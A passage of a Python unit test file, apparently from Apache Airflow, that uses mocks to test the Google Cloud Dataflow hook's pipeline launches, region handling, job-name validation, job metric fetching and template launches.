@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables["region"] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_multiple_extra_packages(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables['extra-package'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables['extra-package'] = ['a.whl', 'b.whl']
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
('python3',),
('python2',),
('python3',),
('python3.6',),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_interpreter(
self, py_interpreter, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=py_interpreter,
py_requirements=None,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=py_interpreter,
py_options=PY_OPTIONS,
py_requirements=None,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
(['foo-bar'], False),
(['foo-bar'], True),
([], True),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_non_empty_py_requirements_and_without_system_packages(
self,
current_py_requirements,
current_py_system_site_packages,
mock_callback_on_job_id,
mock_dataflow_wait_for_done,
mock_uuid,
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
def test_start_python_dataflow_with_empty_py_requirements_and_without_system_packages(
self, mock_dataflow_wait_for_done, mock_uuid
):
self.dataflow_hook.beam_hook = BeamHook(runner="DataflowRunner")
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"), self.assertRaisesRegex(
AirflowException, "Invalid method invocation."
):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=[],
on_new_job_id_callback=on_new_job_id_callback,
)
mock_dataflow_wait_for_done.assert_not_called()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_multiple_values_in_variables(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['mock-option'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(passed_variables)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['region'] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@parameterized.expand(
[
(JOB_NAME, JOB_NAME, False),
('test-example', 'test_example', False),
(f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}', JOB_NAME, True),
(f'test-example-{MOCK_UUID_PREFIX}', 'test_example', True),
('df-job-1', 'df-job-1', False),
('df-job', 'df-job', False),
('dfjob', 'dfjob', False),
('dfjob1', 'dfjob1', False),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
def test_valid_dataflow_job_name(self, expected_result, job_name, append_job_name, mock_uuid4):
job_name = self.dataflow_hook.build_dataflow_job_name(
job_name=job_name, append_job_name=append_job_name
)
self.assertEqual(expected_result, job_name)
#
@parameterized.expand([("1dfjob@",), ("dfjob@",), ("df^jo",)])
def test_build_dataflow_job_name_with_invalid_value(self, job_name):
self.assertRaises(
ValueError, self.dataflow_hook.build_dataflow_job_name, job_name=job_name, append_job_name=False
)
#
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_get_job(self, mock_conn, mock_dataflowjob):
method_fetch_job_by_id = mock_dataflowjob.return_value.fetch_job_by_id
self.dataflow_hook.get_job(job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_by_id.assert_called_once_with(TEST_JOB_ID)
#
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_metrics_by_id = mock_dataflowjob.return_value.fetch_job_metrics_by_id
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_metrics_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id_controller(self, mock_conn):
method_get_metrics = (
mock_conn.return_value.projects.return_value.locations.return_value.jobs.return_value.getMetrics
)
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
method_get_metrics.return_value.execute.assert_called_once_with(num_retries=0)
method_get_metrics.assert_called_once_with(
jobId=TEST_JOB_ID, projectId=TEST_PROJECT_ID, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_messages_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_messages_by_id = mock_dataflowjob.return_value.fetch_job_messages_by_id
self.dataflow_hook.fetch_job_messages_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_messages_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_autoscaling_events_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_autoscaling_events_by_id = (
mock_dataflowjob.return_value.fetch_job_autoscaling_events_by_id
)
self.dataflow_hook.fetch_job_autoscaling_events_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_autoscaling_events_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_wait_for_done(self, mock_conn, mock_dataflowjob):
method_wait_for_done = mock_dataflowjob.return_value.wait_for_done
self.dataflow_hook.wait_for_done(
job_name="JOB_NAME",
project_id=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
multiple_jobs=False,
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
name="JOB_NAME",
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
job_id=TEST_JOB_ID,
num_retries=self.dataflow_hook.num_retries,
multiple_jobs=False,
drain_pipeline=self.dataflow_hook.drain_pipeline,
cancel_timeout=self.dataflow_hook.cancel_timeout,
wait_until_finished=self.dataflow_hook.wait_until_finished,
)
method_wait_for_done.assert_called_once_with()
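# TestDataflowTemplateHook covers classic template launches (region from a variable or
# parameter, runtime-environment merging), flex-template launches, job cancellation,
# and gcloud-based Dataflow SQL jobs.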
class TestDataflowTemplateHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow(self, mock_conn, mock_controller, mock_uuid):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
variables = {'zone': 'us-central1-f', 'tempLocation': 'gs://test/temp'}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables=copy.deepcopy(variables),
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={
'jobName': f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
'parameters': PARAMETERS,
'environment': variables,
},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id='test-job-id',
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_variable(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables={'region': TEST_LOCATION},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
projectId=TEST_PROJECT,
location=TEST_LOCATION,
gcsPath=TEST_TEMPLATE,
body=mock.ANY,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_parameter(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables={},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={'jobName': UNIQUE_JOB_NAME, 'parameters': PARAMETERS, 'environment': {}},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment={"numWorkers": 17},
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": RUNTIME_ENV}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_update_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
del options_with_runtime_env["numWorkers"]
runtime_env = {"numWorkers": 17}
expected_runtime_env = copy.deepcopy(RUNTIME_ENV)
expected_runtime_env.update(runtime_env)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment=runtime_env,
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": expected_runtime_env}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_flex_template(self, mock_conn, mock_controller):
mock_locations = mock_conn.return_value.projects.return_value.locations
launch_method = mock_locations.return_value.flexTemplates.return_value.launch
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
mock_controller.return_value.get_jobs.return_value = [{"id": TEST_JOB_ID}]
